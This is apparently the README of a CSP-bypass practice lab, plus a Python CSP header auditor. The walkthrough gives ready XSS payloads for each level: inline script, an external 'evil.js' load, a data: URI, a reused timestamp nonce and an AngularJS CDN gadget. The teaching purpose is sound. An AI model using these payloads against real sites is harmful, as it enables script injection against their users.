A bypass lab for the CSP security standard, which is a protection mechanism against XSS vulnerabilities. This project contains sample test cases for bypassing incorrectly and incompletely configured CSP headers.
Content Security Policy is a computer security standard that was introduced to prevent cross-site scripting, click-through, and other code injection attacks resulting from the execution of malicious content in the context of a trusted web page.
This project was created with PHP.
- unsafe-inline
- External Resource
- data directive
- src nonce
- Commonly used JS CDN
- Google Callback Functions
Check each level's policy with https://csp-evaluator.withgoogle.com before looking at the solutions.
Because the policy uses the 'unsafe-inline' source, any input that contains a script tag is executed as JavaScript. Example payload:

```html
<script>alert(1)</script>
```
JavaScript from yourjavascript.com, an external resource, is allowed by the policy, so a script hosted there is executed. Go to yourjavascript.com, upload the script, and reference it:

```html
<script type="text/javascript" src="http://yourjavascript.com/0513280132/evil.js"></script>
```
Allowing the data: scheme in script-src permits the execution of arbitrary inline scripts:

```html
<script src=data:text/javascript,alert(1337)></script>
```
The nonce value in the response's CSP header is the base64 encoding of the current time, so it can be predicted and reused. Example payload:

```html
<script nonce="MjcuMDMuMjAyMS8yMjoxNw==">alert(1)</script>
```
One of the most used JavaScript CDNs is cdnjs.cloudflare.com. At this level we try to trigger XSS on a page whose policy allows that CDN as a script source.

```html
<Script Src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js> </Script><K Ng-App>{{$new.constructor('alert(1)')()}}
```
As in the previous level, the allowed Google domains expose callback functions that can be used here.
Given this CSP header:

```http
Content-Security-Policy: frame-src https://example.com
```

the following `<iframe>` is blocked and won't load:

```html
<iframe src="https://not-example.com/"></iframe>
```

Load the allowed page (https://example.com) in the frame instead.
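As an added defensive check that is not part of this project, the following Python script audits a CSP header for the script-src weaknesses the levels above exercise (unsafe-inline, data:, a timestamp-derived nonce, whole-host allowlists). The sample policies and the random-looking nonce in it are constructed; only the level-4 nonce comes from this page. CSP Evaluator performs the same kind of review more thoroughly.

```python
import base64
import re

# Constructed sample policies (not taken from the project's PHP code), one per level above.
SAMPLE_POLICIES = {
    "unsafe-inline": "default-src 'self'; script-src 'self' 'unsafe-inline'",
    "external": "script-src 'self' http://yourjavascript.com",
    "data": "script-src 'self' data:",
    "nonce": "script-src 'nonce-MjcuMDMuMjAyMS8yMjoxNw=='",  # the level-4 nonce from this page
    "cdn": "script-src 'self' https://cdnjs.cloudflare.com",
}

def parse_csp(header):
    """Split "dir a b; dir2 c" into {"dir": ["a", "b"], "dir2": ["c"]}; names are lowercased."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy

def nonce_looks_predictable(nonce):
    """True when the nonce base64-decodes to timestamp-like text such as "27.03.2021/22:17"."""
    try:
        decoded = base64.b64decode(nonce, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return False  # random bytes are not ASCII text (or not valid base64 at all)
    return re.fullmatch(r"[0-9][0-9 ./:T-]*", decoded) is not None

def audit_csp(header):
    """Return (code, message) findings for script-src, falling back to default-src."""
    policy = parse_csp(header)
    sources = policy.get("script-src", policy.get("default-src"))
    if sources is None:
        return [("no-script-src", "neither script-src nor default-src is set: scripts are unrestricted")]
    findings = []
    for src in sources:
        s = src.strip("'")
        if s.lower() == "unsafe-inline":
            findings.append(("unsafe-inline", "inline <script> blocks execute (unsafe-inline level)"))
        elif s.lower().startswith("data:"):
            findings.append(("data-scheme", "data: URIs run as scripts (data directive level)"))
        elif s.lower().startswith("nonce-") and nonce_looks_predictable(s[6:]):
            findings.append(("predictable-nonce", f"nonce {s[6:]} decodes to timestamp-like text (nonce level)"))
        elif s in ("*", "http:", "https:"):
            findings.append(("scheme-or-wildcard", f"{s} allows scripts from any host"))
        elif re.match(r"^(https?://|\*\.|[a-z0-9*-]+\.)", s.lower()):
            findings.append(("host-allowlist", f"{s}: whole host allowed; review it for JSONP endpoints or "
                             "script gadgets such as AngularJS (external, CDN and callback levels)"))
    return findings
```

Run `audit_csp` on each level's header; an empty result together with a nonce that `nonce_looks_predictable` rejects means the script-src has none of the weaknesses listed above.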